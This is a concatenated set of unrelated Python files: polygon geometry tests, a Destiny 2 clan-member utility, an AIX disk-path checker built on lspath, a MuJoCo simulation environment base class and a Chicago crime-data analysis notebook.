5), (2, 2), (4, 2), (3, 4), (5, 4), (4, 0), (1, 1), ]) f = poly.contains_bbox self.assertTrue(f(B(2, 1, 4, 1.5))) def test_contains_poly(self): # Simple triangle a = Pg([(1, 2), (3, 5), (4, 1), (1, 2)]) f = a.contains_polygon # Fully internal b = Pg([(2, 2), (3, 4), (3, 2), (2, 2)]) self.assertTrue(f(b)) # Fully external b = b.move(10, 0) self.assertFalse(f(b)) # Partly external b = b.move(-10, -2) self.assertFalse(f(b)) # Point contact with boundary self.assertTrue(f(Pg([(3.5, 3), (2, 2), (3, 4), (3.5, 3)]))) # Octagon centred on (0, 0) a = Pg([ (1, 2), (2, 1), (2, -1), (1, -2), (-1, -2), (-2, -1), (-2, 1), (-1, 2), (1, 2), ]) f = a.contains_polygon # Sharing entire boundary lines b = Pg([ (-2, -1), (-2, 1), ( 0, 2), ( 2, 1), ( 2, -1), ( 0, -2), (-2, -1), ]) self.assertTrue(f(b)) b = b.move(4, 0) self.assertFalse(f(b)) # Horseshoe a = Pg([ (1, 1), (1, 6), (2, 5), (2, 2), (4, 2), (3, 4), (5, 4), (4, 0), (1, 1), ]) f = a.contains_polygon b = Pg([ (1, 1), (1, 3), (4, 3), (4, 1), (1, 1), ]) self.assertFalse(f(b)) def test_intersects_point(self): # horseshoe poly = Pg([ (1, 1), (1, 6), (2, 5), (2, 2), (4, 2), (3, 4), (5, 4), (4, 0), (1, 1), ]) f = poly.intersects expect = ( (False, False, False, False, True, False, False), (False, True, True, True, True, False, False), (False, True, True, True, True, False, False), (False, True, True, False, True, False, False), (False, True, True, True, True, True, False), (False, True, True, False, False, False, False), (False, True, False, False, False, False, False), ) for y in range(len(expect)): for x in range(len(expect[y])): self.assertIs(f(P(x, y)), expect[y][x], f"({x}, {y})") def test_intersects_line(self): # simple triangle poly = Pg([(1, 2), (3, 5), (4, 1), (1, 2)]) f = poly.intersects # Fully external self.assertFalse(f(L((10, 0), (10, 2)))) self.assertFalse(f(L((2, 0), (0, 3)))) # Partly external self.assertTrue(f(L((3, 3), (5, 3)))) # Fully internal self.assertTrue(f(L((3, 2), (2, 3)))) # Spanning self.assertTrue(f(L((1, 2), (3.5, 3)))) # On boundary self.assertTrue(f(L((3.5, 3), (3.75, 2)))) self.assertTrue(f(L((3.5, 3), (4.5, -1)))) # horseshoe poly = Pg([ (1, 1), (1, 6), (2, 5), (2, 2), (4, 2), (3, 4), (5, 4), (4, 0), (1, 1), ]) f = poly.intersects # Fully external self.assertFalse(f(L((10, 0), (10, 2)))) self.assertFalse(f(L((3, 0), (0, 0)))) # Partly external self.assertTrue(f(L((4, 3), (6, 3)))) # Fully internal self.assertTrue(f(L((3, 1), (2, 1)))) # Spanning self.assertTrue(f(L((1, 4), (2, 4)))) # From boundary to internal self.assertTrue(f(L((1, 2), (3, 1)))) # On boundary self.assertTrue(f(L((1, 2), (1, 5)))) self.assertTrue(f(L((4, 4), (6, 4)))) def test_intersects_bbox(self): # simple triangle poly = Pg([(1, 2), (3, 5), (4, 1), (1, 2)]) f = poly.intersects # Fully internal self.assertTrue(f(B(2, 2, 3, 3))) # Fully external self.assertFalse(f(B(20, 20, 30, 30))) # Partly external self.assertTrue(f(B(1, 1, 3, 3))) # Point contact with boundary self.assertTrue(f(B(2, 2, 3.5, 3))) # octagon centred on (0, 0) poly = Pg([ (1, 2), (2, 1), (2, -1), (1, -2), (-1, -2), (-2, -1), (-2, 1), (-1, 2), (1, 2), ]) f = poly.intersects # Sharing entire boundary lines self.assertTrue(f(B(-2, -1, 2, 1))) self.assertTrue(f(B(-1, 2, 1, 4))) # horseshoe poly = Pg([ (1, 1), (1, 6), (2, 5), (2, 2), (4, 2), (3, 4), (5, 4), (4, 0), (1, 1), ]) f = poly.intersects self.assertTrue(f(B(2, 1, 4, 1.5))) def test_intersects_poly(self): # Simple triangle a = Pg([(1, 2), (3, 5), (4, 1), (1, 2)]) f = a.intersects # Fully internal b = Pg([(2, 2), (3, 4), (3, 2), (2, 2)]) self.assertTrue(f(b)) # Fully external b = b.move(10, 0) self.assertFalse(f(b)) # Partly external b = b.move(-10, -2) self.assertTrue(f(b)) # Point contact with boundary self.assertTrue(f(Pg([(3.5, 3), (2, 2), (3, 4), (3.5, 3)]))) # Octagon centred on (0, 0) a = Pg([ (1, 2), (2, 1), (2, -1), (1, -2), (-1, -2), (-2, -1), (-2, 1), (-1, 2), (1, 2), ]) f = a.intersects # Sharing entire boundary lines b = Pg([ (-2, -1), (-2, 1), ( 0, 2), ( 2, 1), ( 2, -1), ( 0, -2), (-2, -1), ]) self.assertTrue(f(b)) b = b.move(4, 0) self.assertTrue(f(b)) # Horseshoe a = Pg([ (1, 1), (1, 6), (2, 5), (2, 2), (4, 2), (3, 4), (5, 4), (4, 0), (1, 1), ]) f = a.intersects b = Pg([ (1, 1), (1, 3), (4, 3), (4, 1), (1, 1), ]) self.assertTrue(f(b)) def test_intersection_line(self): # Simple triangle a = Pg([(1, 2), (3, 5), (4, 1), (1, 2)]) f = a.intersection self.assertIsNone(f(L((0, 0), (1, 0)))) b = L((2, 2), (3, 2)) self.assertEqual(f(b), b) b = L((1, 2), (3, 5)) self.assertEqual(f(b), b) # Square a = Pg([(0, 0), (0, 2), (2, 2), (2, 0), (0, 0)]) f = a.intersection # - Edge to edge b = L((0, 1), (2, 1)) self.assertEqual(f(b), b) # - Vertex to vertex b = L((0, 0), (2, 2)) self.assertEqual(f(b), b) # - Vertex to edge b = L((0, 0), (1, 2)) self.assertEqual(f(b), b) # - Edge to internal b = L((0, 1), (1, 1)) self.assertEqual(f(b), b) # - From internal to external b = L((1, 1), (1, 3)) self.assertEqual(f(b), L((1, 1), (1, 2))) # - Edge to external b = L((2, 1), (4, 4)) self.assertEqual(f(b), P(2, 1)) # - External to vertex b = L((-2, -2), (0, 0)) self.assertEqual(f(b), P(0, 0)) # Non-convex a = Pg([ (1, 0), (1, 4), (2, 4), (2, 1), (4, 1), (4, 4), (5, 4), (5, 0), (1, 0)]) b = L((0, 2), (6, 2)) f = a.intersection self.assertIsNone(f(L((0, -1), (2, -2)))) self.assertEqual(f(b), ML((L((1, 2), (2, 2)), L((4, 2), (5, 2))))) # Vertex contact self.assertEqual(f(L((0, 3), (2, 5))), P(1, 4)) # Single-line intersections self.assertEqual(f(L((1, -1), (1, 7))), L((1, 0), (1, 4))) self.assertEqual(f(L((1, 2), (1, 3))), L((1, 2), (1, 3))) self.assertEqual(f(L((1, 2), (1, 3))), L((1, 2), (1, 3))) self.assertEqual(f(L((2, 1), (4, 1))), L((2, 1), (4, 1))) self.assertEqual(f(L((2, 4), (1, 3))), L((2, 4), (1, 3))) # Multiple line intersections, passing through vertices b = L((0, -1), (6, 5)) exp = ML((L((1, 0), (2, 1)), L((4, 3), (5, 4)))) self.assertEqual(f(b), exp) # Mixed lines and points b = L((0, 5), (6, 2)) exp = Co((P(2, 4), L((4, 3), (5, 2.5)))) self.assertEqual(f(b), exp) def test_crop_line(self): # Simple triangle a = Pg([(1, 2), (3, 5), (4, 1), (1, 2)]) f = a.crop_line self.assertIsNone(f(L((0, 0), (1, 0)))) self.assertEqual(f(L((0, 0), (0, 5))), a) self.assertEqual(f(L((1, 2), (3, 5))), a) b = L((0, 3), (2, 1)) self.assertEqual(f(b), P(1, 2)) b = L((3, 5), (1, 2)) self.assertTrue(b.coterminous(f(b))) # Right triangle a = Pg([(0, 0), (0, 3), (3, 0), (0, 0)]) f = a.crop_line # - Horizontal crop exp = Pg([(0, 1), (0, 3), (2, 1), (0, 1)]) self.assertEqual(f(L((1, 1), (0, 1))), exp) exp = Pg([(0, 0), (0, 1), (2, 1), (3, 0), (0, 0)]) self.assertEqual(f(L((0, 1), (1, 1))), exp) # Square a = Pg([(0, 0), (0, 2), (2, 2), (2, 0), (0, 0)]) f = a.crop_line # - Crop between two vertices exp = Pg([(0, 0), (2, 2), (2, 0), (0, 0)]) self.assertEqual(f(L((0, 0), (2, 2))), exp) # - Crop from one vertex to an edge exp = Pg([(0, 0), (0, 2), (1, 0), (0, 0)]) self.assertEqual(f(L((0, 2), (1, 0))), exp) def test_crop_line_non_convex(self): a = Pg([ (1, 0), (1, 4), (2, 4), (2, 1), (4, 1), (4, 4), (5, 4), (5, 0), (1, 0)]) f = a.crop_line # Single point b = L((6, 3), (4, 5)) self.assertEqual(f(b), P(5, 4)) # Single polygon b = L((0, 2), (6, 2)) exp = Pg([ (1, 0), (1, 2), (2, 2), (2, 1), (4, 1), (4, 2), (5, 2), (5, 0), (1, 0)]) self.assertEqual(f(b), exp) # Multiple polygons b = -b exp = MPg([ Pg([(1, 2), (1, 4), (2, 4), (2, 2), (1, 2)]), Pg([(4, 2), (4, 4), (5, 4), (5, 2), (4, 2)]), ]) # Single polygon, including boundary segments b = L((2, 1), (3, 1)) exp = Pg([(1, 0), (1, 1), (5, 1), (5, 0), (1, 0)]) self.assertEqual(f(b), exp) # Multiple boundary segments b = L((3, 4), (2, 4)) exp = ML((L((1, 4), (2, 4)), L((4, 4), (5, 4)))) self.assertEqual(f(b), exp) # Single polygon that includes the start point b = L((1, 1), (2, 0)) exp = Pg([(1, 0), (1, 1), (2, 0), (1, 0)])
import asyncio import datetime as dt import json import os import logging import pydest import aiohttp logger = logging.getLogger("d2util") def str_to_datetime(date_time: str): return dt.datetime.fromisoformat(date_time) def get_bungie_name(group_member: dict) -> str: if group_member["destinyUserInfo"]["bungieGlobalDisplayName"] and group_member["destinyUserInfo"].get("bungieGlobalDisplayNameCode") is not None: return f"{group_member['destinyUserInfo']['bungieGlobalDisplayName']}#{group_member['destinyUserInfo']['bungieGlobalDisplayNameCode']}" else: pass class ClanUtil: def __init__(self, api_key: str, group_id: int, members_data_path="members.json", loop=None) -> (list, list): self.destiny = pydest.Pydest(api_key, loop) # 한국어가 pydest 모듈에만 목록에 존재하지 않아서 임시로 땜빵... self.destiny._manifest.manifest_files["ko"] = "" self.group_id = group_id self.members_data_path = members_data_path self.members_data_cache = [] if not os.path.exists(members_data_path): with open(members_data_path, "w", encoding="utf-8") as f: f.write("[]") def find_member_from_cache(self, bungie_name: str = None, membership_id: int = None) -> dict: for n in self.members_data_cache: if bungie_name and bungie_name == get_bungie_name(n): return n elif membership_id and membership_id == n["destinyUserInfo"]["membershipId"]: return n else: return {} async def member_diff(self, cmp_file_path="members.json"): # 번지 API 서버 요청 resp = await self.destiny.api.get_members_of_group(self.group_id) raw_new: list = resp["Response"]["results"] if self.members_data_cache: raw_old: list = self.members_data_cache else: with open(cmp_file_path, "r", encoding="utf-8") as f: raw_old: list = json.load(f) # 파일도 비어있는 경우 새로 저장한 다음 바로 비어있는 리스트 반환 if not raw_old: with open(cmp_file_path, "w", encoding="utf-8") as f: json.dump(raw_new, f, ensure_ascii=False, indent=2) return [], [] # 집합 변환 후 변화 감지 set_new = set(n["destinyUserInfo"]["membershipId"] for n in raw_new) set_old = set(n["destinyUserInfo"]["membershipId"] for n in raw_old) set_joined = set_new - set_old set_leaved = set_old - set_new # 대상자들 데이터 별도 list 화 list_joined = [n for n in raw_new if n["destinyUserInfo"]["membershipId"] in set_joined] list_leaved = [n for n in raw_old if n["destinyUserInfo"]["membershipId"] in set_leaved] # 파일, 메모리에 저장 self.members_data_cache = raw_new with open(cmp_file_path, "w", encoding="utf-8") as f: json.dump(raw_new, f, ensure_ascii=False, indent=2) # 감지한 사람들 return return list_joined, list_leaved async def members_offline_time(self, cut_day=21) -> list: # 클랜원 목록 불러오기 resp = await self.destiny.api.get_members_of_group(self.group_id) members: list = resp["Response"]["results"] # 커트라인 제작 today = dt.datetime.utcnow().timestamp() cut_line = today - cut_day * 86400 target = [n for n in members if int(n["lastOnlineStatusChange"]) < cut_line] target.sort(key=lambda x: x["lastOnlineStatusChange"]) # 보기 쉽게 정렬 return target async def online_members(self): resp = await self.destiny.api.get_members_of_group(self.group_id) members: list = resp["Response"]["results"] online = filter(lambda x: x.get("isOnline"), members) return online async def user_activity(self, membership_type: int, membership_id: int) -> tuple: try: resp = await asyncio.wait_for(self.destiny.api.get_profile(membership_type, membership_id, [204]), timeout=10) except asyncio.TimeoutError: logger.warning(f"{membership_id} / Request Timeout") return "온라인(시간 초과)", # 오류 if not resp.get("Response") or resp.get("ErrorCode") != 1: logger.warning(f"{membership_id} / {resp.get('ErrorCode', 'Wrong response form')}") return "온라인(응답 오류)", if not resp['Response']['characterActivities'].get('data'): return "온라인", recent = sorted(resp['Response']['characterActivities']['data'].values(), key=lambda x: x["dateActivityStarted"])[-1] if not recent["currentActivityHash"]: return "온라인", activity = await self.destiny.decode_hash(recent["currentActivityHash"], "DestinyActivityDefinition", language="ko") if not activity["displayProperties"]["name"]: # 궤도상에 있는 경우 return "궤도", try: activity_mode = await self.destiny.decode_hash(recent["currentActivityModeHash"], "DestinyActivityModeDefinition", language="ko") except pydest.pydest.PydestException as e: activity_mode = await self.destiny.decode_hash(activity["activityTypeHash"], "DestinyActivityTypeDefinition", language="ko") return activity_mode["displayProperties"]["name"], activity["displayProperties"]["name"] async def is_member_in_clan(self, bungie_name: str, membership_id: int = 0) -> dict: if bungie_name: bungie_name_list = [n for n in self.members_data_cache if get_bungie_name(n) == bungie_name] if bungie_name_list: return bungie_name_list[0] else: return {} elif membership_id: bungie_id_list = [n for n in self.members_data_cache if int(n["destinyUserInfo"]["membershipId"]) == membership_id] if membership_id in bungie_id_list: return bungie_id_list[0] else: return {} else: return {}
<filename>script/path_check.py #!/usr/bin/python3 ####################################################################### ################### Check the AIX system disk path! ################### ####################################################################### import os class PathCheck(): # Check the disable path in the system def disable_check(self): disable_cmd= 'lspath -F "name status path_id parent connection"\ |grep -i disable' disable_path = os.popen(disable_cmd) disable_path = disable_path.read() disable_path_list = [] if len(disable_path) == 0: disable_result = 'No disable path was found.' else: disable_path = os.popen(disable_cmd) for path in disable_path: path = path.strip() path = path.split(' ') name = path[0] status = path[1] path_id = path[2] parent = path[3] connection = path[4] disablepath = {'name':name,'status':status,\ 'path_id':path_id,'parent':parent,\ 'connection':connection} disable_path_list.append(disablepath) disable_result = disable_path_list return disable_result # Check the defined path in the system def defined_check(self): defined_cmd= 'lspath -F "name status path_id parent connection"\ |grep -i defined' defined_path = os.popen(defined_cmd) defined_path = defined_path.read() defined_path_list = [] if len(defined_path) == 0: defined_result = 'No defined path was found.' else: defined_path = os.popen(defined_cmd) for path in defined_path: path = path.strip() path = path.split(' ') name = path[0] status = path[1] path_id = path[2] parent = path[3] connection = path[4] definedpath = {'name':name,'status':status,\ 'path_id':path_id,'parent':parent,\ 'connection':connection} defined_path_list.append(definedpath) defined_result = defined_path_list return defined_result # Check the missing path in the system def missing_check(self): missing_cmd= 'lspath -F "name status path_id parent connection"\ |grep -i missing' missing_path = os.popen(missing_cmd) missing_path = missing_path.read() missing_path_list = [] if len(missing_path) == 0: missing_result = 'No missing path was found.' else: missing_path = os.popen(missing_cmd) for path in missing_path: path = path.strip() path = path.split(' ') name = path[0] status = path[1] path_id = path[2] parent = path[3] connection = path[4] missingpath = {'name':name,'status':status,\ 'path_id':path_id,'parent':parent,\ 'connection':connection} missing_path_list.append(missingpath) missing_result = missing_path_list return missing_result # Check the failed path in the system def failed_check(self): failed_cmd= 'lspath -F "name status path_id parent connection"\ |grep -i failed' failed_path = os.popen(failed_cmd) failed_path = failed_path.read() failed_path_list = [] if len(failed_path) == 0: failed_result = 'No failed path was found.' else: failed_path = os.popen(failed_cmd) for path in failed_path: path = path.strip() path = path.split(' ') name = path[0] status = path[1] path_id = path[2] parent = path[3] connection = path[4] failedpath = {'name':name,'status':status,\ 'path_id':path_id,'parent':parent,\ 'connection':connection} failed_path_list.append(failedpath) failed_result = failed_path_list return failed_result # sort the data def result_sort(self): abnormal_path_result = [] disable_info = self.disable_check() disable_dict = {'name':'disable','result':disable_info} defined_info = self.defined_check() defined_dict = {'name':'defined','result':defined_info} missing_info = self.missing_check() missing_dict = {'name':'missing','result':missing_info} failed_info = self.failed_check() failed_dict = {'name':'failed','result':failed_info} abnormal_path_result.extend([disable_dict,defined_dict,\ missing_dict,failed_dict]) return abnormal_path_result
# Copyright (c) 2020, <NAME>, Honda Research Institute Europe GmbH, and # Technical University of Darmstadt. # All rights reserved. # # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions are met: # 1. Redistributions of source code must retain the above copyright # notice, this list of conditions and the following disclaimer. # 2. Redistributions in binary form must reproduce the above copyright # notice, this list of conditions and the following disclaimer in the # documentation and/or other materials provided with the distribution. # 3. Neither the name of <NAME>, Honda Research Institute Europe GmbH, # or Technical University of Darmstadt, nor the names of its contributors may # be used to endorse or promote products derived from this software without # specific prior written permission. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND # ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED # WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE # DISCLAIMED. IN NO EVENT SHALL <NAME>, HONDA RESEARCH INSTITUTE EUROPE GMBH, # OR TECHNICAL UNIVERSITY OF DARMSTADT BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, # SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, # PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; # OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER # IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) # ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE # POSSIBILITY OF SUCH DAMAGE. from abc import ABC, abstractmethod from copy import deepcopy from math import floor from typing import Optional import mujoco_py import numpy as np from init_args_serializer import Serializable from mujoco_py.generated.const import RND_FOG import pyrado from pyrado.environments.sim_base import SimEnv from pyrado.spaces.base import Space from pyrado.tasks.base import Task from pyrado.utils.data_types import RenderMode from pyrado.utils.input_output import print_cbt class MujocoSimEnv(SimEnv, ABC, Serializable): """ Base class for MuJoCo environments. Uses Serializable to facilitate proper serialization. .. seealso:: https://github.com/openai/gym/blob/master/gym/envs/mujoco/mujoco_env.py """ def __init__( self, model_path: str, frame_skip: int = 1, dt: Optional[float] = None, max_steps: int = pyrado.inf, task_args: Optional[dict] = None, ): """ Constructor :param model_path: path to the MuJoCo xml model config file :param frame_skip: number of simulation frames for which the same action is held, results in a multiplier of the time step size `dt` :param dt: by default the time step size is the one from the mujoco config file multiplied by the number of frame skips (legacy from OpenAI environments). By passing an explicit `dt` value, this can be overwritten. Possible use case if if you know that you recorded a trajectory with a specific `dt`. :param max_steps: max number of simulation time steps :param task_args: arguments for the task construction, e.g `dict(fwd_rew_weight=1.)` """ Serializable._init(self, locals()) # Initialize self.model_path = model_path self._domain_param = self.get_nominal_domain_param() if dt is None: # Specify the time step size as a multiple of MuJoCo's simulation time step size self.frame_skip = frame_skip else: # Specify the time step size explicitly with open(self.model_path, mode="r") as file_raw: xml_model_temp = file_raw.read() xml_model_temp = self._adapt_model_file(xml_model_temp, self.domain_param) # Create a dummy model to extract the solver's time step size model_tmp = mujoco_py.load_model_from_xml(xml_model_temp) frame_skip = dt / model_tmp.opt.timestep if frame_skip.is_integer(): self.frame_skip = int(frame_skip) elif dt > model_tmp.opt.timestep: print_cbt( f"The desired time step size is {dt} s, but solver's time step size in the MuJoCo config file is " f"{model_tmp.opt.timestep} s. Thus, frame_skip is rounded down to {floor(frame_skip)}.", "y", ) self.frame_skip = floor(frame_skip) else: # The number of skipped frames must be >= 1 pyrado.ValueErr(given=dt, ge_constraint=model_tmp.opt.timestep) # Creat the MuJoCo model with open(self.model_path, mode="r") as file_raw: # Save raw (with placeholders) XML-file as attribute since we need it for resetting the domain params self.xml_model_template = file_raw.read() self._create_mujoco_model() # Call SimEnv's constructor super().__init__(dt=self.model.opt.timestep * self.frame_skip, max_steps=max_steps) # Memorize the initial states of the model from the xml (for fixed init space or later reset) self.init_qpos = self.sim.data.qpos.copy() self.init_qvel = self.sim.data.qvel.copy() # Initialize space (to be overwritten in constructor of subclasses) self._init_space = None # Create task if not (isinstance(task_args, dict) or task_args is None): raise pyrado.TypeErr(given=task_args, expected_type=dict) self.task_args = dict() if task_args is None else task_args self._task = self._create_task(self.task_args) # Visualization self.camera_config = dict() self.viewer = None self._curr_act = np.zeros(self.act_space.shape) @property @abstractmethod def state_space(self) -> Space: raise NotImplementedError @property @abstractmethod def obs_space(self) -> Space: raise NotImplementedError @property @abstractmethod def act_space(self) -> Space: raise NotImplementedError @property def init_space(self) -> Space: return self._init_space @init_space.setter def init_space(self, space: Space): if not isinstance(space, Space): raise pyrado.TypeErr(given=space, expected_type=Space) self._init_space = space @property def task(self) -> Task: return self._task @abstractmethod def _create_task(self, task_args: dict) -> Task: # Needs to implemented by subclasses raise NotImplementedError @property def domain_param(self) -> dict: return deepcopy(self._domain_param) @domain_param.setter def domain_param(self, domain_param: dict): if not isinstance(domain_param, dict): raise pyrado.TypeErr(given=domain_param, expected_type=dict) # Update the parameters self._domain_param.update(domain_param) # Update MuJoCo model self._create_mujoco_model() if self.viewer is not None: # If the viewer already exists and we reset the domain parameters, we must also recreate the viewer since # it references to the simulation object which get's reconstructed during _create_mujoco_model() import glfw glfw.destroy_window(self.viewer.window) self.viewer = None # Update task self._task = self._create_task(self.task_args) def _adapt_model_file(self, xml_model: str, domain_param: dict) -> str: """ Changes the model's XML-file given the current domain parameters before constructing the MuJoCo simulation. One use case is for example the cup_scale for the `WAMBallInCupSim` where multiple values in the model's XML-file are changed based on one domain parameter. .. note:: It is mandatory to call this function in case you modified the mxl config file with tags like `[DP_NAME]`. :param xml_model: parsed model file :param domain_param: copy of the environments domain parameters :return: adapted model file where the placeholders are filled with numerical values """ # The mesh dir is not resolved when later passed as a string, thus we do it manually xml_model = xml_model.replace(f"[ASSETS_DIR]", pyrado.MUJOCO_ASSETS_DIR) # Replace all occurrences of the domain parameter placeholder with its value for key, value in domain_param.items(): xml_model = xml_model.replace(f"[{key}]", str(value)) return xml_model @abstractmethod def _mujoco_step(self, act: np.ndarray) -> dict: """ Apply the given action to the MuJoCo simulation. This executes one step of the physics simulation. :param act: action :return: dictionary with optional information from MuJoCo """ def _create_mujoco_model(self): """ Called to update the MuJoCo model by rewriting and reloading the XML file. .. note:: This function is called from the constructor and from the domain parameter setter. """ xml_model = self.xml_model_template # don't change the template xml_model = self._adapt_model_file(xml_model, self.domain_param) # Create MuJoCo model from parsed XML file self.model = mujoco_py.load_model_from_xml(xml_model) self.sim = mujoco_py.MjSim(self.model, nsubsteps=self.frame_skip) def configure_viewer(self): """Configure the camera when the viewer is initialized. You need to set `self.camera_config` before.""" # Render a fog around the scene by default if self.camera_config.pop("render_fog", True): self.viewer.scn.flags[RND_FOG] = 1 # Parse all other options for key, value in self.camera_config.items(): if isinstance(value, np.ndarray): getattr(self.viewer.cam, key)[:] = value else: setattr(self.viewer.cam, key, value) def reset(self, init_state: np.ndarray = None, domain_param: dict = None) -> np.ndarray: # Reset time self._curr_step = 0 # Reset the domain parameters if domain_param is not None: self.domain_param = domain_param # Sample or set the initial simulation state if init_state is None: # Sample init state from init state space init_state = self.init_space.sample_uniform() elif not isinstance(init_state, np.ndarray): # Make sure init state is a numpy array try: init_state = np.asarray(init_state) except Exception: raise pyrado.TypeErr(given=init_state, expected_type=np.ndarray) if not self.init_space.contains(init_state, verbose=True): raise pyrado.ValueErr(msg="The init state must be within init state space!") # Update the state attribute self.state = init_state.copy() # Reset the task which also resets the reward function if necessary self._task.reset(env_spec=self.spec, init_state=init_state.copy()) # Reset MuJoCo simulation model (only reset the joint configuration) self.sim.reset() old_state = self.sim.get_state() nq = self.model.nq nv = self.model.nv if not init_state[:nq].shape == old_state.qpos.shape: # check joint positions dimension raise pyrado.ShapeErr(given=init_state[:nq], expected_match=old_state.qpos) # Exclude everything that is appended to the state (at the end), e.g. the ball position for WAMBallInCupSim if not init_state[nq : nq + nv].shape == old_state.qvel.shape: # check joint velocities dimension raise pyrado.ShapeErr(given=init_state[nq : nq + nv], expected_match=old_state.qvel) new_state = mujoco_py.MjSimState( # Exclude everything that is appended to the state (at the end), e.g. the ball position for WAMBallInCupSim old_state.time, init_state[:nq], init_state[nq : nq + nv], old_state.act, old_state.udd_state, ) self.sim.set_state(new_state) self.sim.forward() # Return an observation return self.observe(self.state) def step(self, act: np.ndarray) -> tuple: # Current reward depending on the state (before step) and the (unlimited) action remaining_steps = self._max_steps - (self._curr_step + 1) if self._max_steps is not pyrado.inf else 0 self._curr_rew = self.task.step_rew(self.state, act, remaining_steps) # Apply actuator limits act = self.limit_act(act) self._curr_act = act # just for the render function # Apply the action and simulate the resulting dynamics info = self._mujoco_step(act) self._curr_step += 1 # Check if the environment is done due to a failure within the mujoco simulation (e.g. bad inputs) mjsim_done = info.get("failed", False) # Check if the task is done task_done = self._task.is_done(self.state) # Handle done case done = mjsim_done or task_done if self._curr_step >= self._max_steps: done = True if done: # Add final reward if done self._curr_rew += self._task.final_rew(self.state, remaining_steps) return self.observe(self.state), self._curr_rew, done, info def render(self, mode: RenderMode = RenderMode(), render_step: int = 1): if self._curr_step % render_step == 0: # Call base class super().render(mode) # Print to console if mode.text: print( f"step: {self._curr_step:4d} | r_t: {self._curr_rew: 1.3f} | a_t: {self._curr_act} | s_t+1: {self.state}" ) # Forward to MuJoCo viewer if mode.video: if self.viewer is None: # Create viewer if not existent (see 'human' mode of OpenAI Gym's MujocoEnv) self.viewer = mujoco_py.MjViewer(self.sim) # Adjust window size and position to custom values import glfw glfw.make_context_current(self.viewer.window) glfw.set_window_size(self.viewer.window, 1280, 720) glfw.set_window_pos(self.viewer.window, 50, 50) self.configure_viewer() self.viewer.render()
<filename>Crime_Chicago_Prediction_Final.py #!/usr/bin/env python # coding: utf-8 # In[2]: import pandas as pd import numpy as np import matplotlib.pyplot as plt import seaborn as sns from sklearn.metrics import mean_squared_error, r2_score from sklearn.linear_model import LinearRegression from sklearn.model_selection import train_test_split import os ##import pandas_profiling import folium import webbrowser from PIL import Image #pandas_profiling.ProfileReport(USA_Housing) # In[3]: ## Import Directory # In[4]: link="Dataset Location(Directory)" dirlist=os.listdir(link) print(dirlist) # ## Import Data # In[5]: c0104=pd.read_csv(link+dirlist[1]) c0507=pd.read_csv(link+dirlist[2]) c0811=pd.read_csv(link+dirlist[3]) c1217=pd.read_csv(link+dirlist[4]) c1719=pd.read_csv(link+dirlist[6]) # In[6]: c0104.columns # ## Creating Data Profile # In[80]: #pandas_profiling.ProfileReport(c0104) # In[81]: #pandas_profiling.ProfileReport(c0507) # In[82]: #pandas_profiling.ProfileReport(c0811) # In[83]: #pandas_profiling.ProfileReport(c1217) # ## Data Cleaning # In[100]: c0811.head() # In[7]: c0104smooth=c0104.dropna(axis=1) c0104smooth.isna().sum() c0104smooth=c0104smooth[1:] print(len(c0104smooth)) c0104.describe().to_csv(link+"des.csv") # In[8]: c0507smooth=c0507.dropna(axis=1) c0507smooth.isna().sum() c0507smooth=c0507smooth[1:] print(len(c0507smooth)) c0507.describe().to_csv(link+"des1.csv") # In[108]: c0811smooth=c0811.dropna(axis=1) c0811smooth.isna().sum() c0811smooth=c0811smooth[1:] print(len(c0811smooth)) c0811.describe().to_csv(link+"des2.csv") c0811smooth.head() # In[10]: c1217smooth=c1217.dropna(axis=1) c1217smooth.isna().sum() c1217smooth=c1217smooth[1:] print(len(c1217smooth)) c1217.describe().to_csv(link+"des3.csv") # ## Subsetting # In[11]: c1=c0104smooth.columns.tolist() c0104smooth=c0104smooth[c1[1:]] c0104smooth.head() # In[12]: c2=c0507smooth.columns.tolist() c0507smooth=c0507smooth[c2[1:]] c0507smooth.head() # In[13]: c3=c0811smooth.columns.tolist() c0811smooth=c0811smooth[c3[1:]] c0811smooth.head() # In[14]: c4=c1217smooth.columns.tolist() c1217smooth=c1217smooth[c4[1:]] c1217smooth.head() c5=c1719smooth.columns.tolist() c1719smooth=c1719smooth c1719smooth.head() c1719smooth.columns # ## Primary Analysis # In[ ]: # In[16]: c0104arr=np.array(c0104smooth['Primary Type']) c0104u=np.unique(c0104arr) # In[17]: c0104key=np.unique(np.array(np.array(c0104smooth['Primary Type']))) c0104val=np.array(c0104smooth['Primary Type'].value_counts().values) print(c0104u[:8]) print(c0104val[:8]) # In[18]: color='cmykrgb' plt.figure(figsize=(20,7)) plt.title("Crime Scenario of 2001-2004 Max: {}={}".format(c0104u[:8][0],c0104val[:8][0]),fontsize=20,color='m') plt.xlabel("Crime Type->",fontsize=15,color='b') plt.ylabel("Crime Occured->",fontsize=15,color='b') plt.grid() plt.bar(c0104u[:8],c0104val[:8],color=color,width=0.5) # In[19]: c0507arr=np.array(c0507smooth['Primary Type']) c0507u=np.unique(c0507arr) c0507key=np.unique(np.array(np.array(c0507smooth['Primary Type']))) c0507val=np.array(c0507smooth['Primary Type'].value_counts().values) print(c0507u[:8]) print(c0507val[:8]) color='cmykrgb' plt.figure(figsize=(20,7)) plt.title("Crime Scenario of 2005-2007 Max: {}={}".format(c0507u[:8][0],c0507val[:8][0]),fontsize=20,color='m') plt.xlabel("Crime Type->",fontsize=15,color='b') plt.ylabel("Crime Occured->",fontsize=15,color='b') plt.grid() plt.bar(c0507u[:8],c0507val[:8],color=color,width=0.5) # In[20]: c0811arr=np.array(c0811smooth['Primary Type']) c0811u=np.unique(c0811arr) c0811key=np.unique(np.array(np.array(c0811smooth['Primary Type']))) c0811val=np.array(c0811smooth['Primary Type'].value_counts().values) print(c0811u[:8]) print(c0811val[:8]) color='cmykrgb' 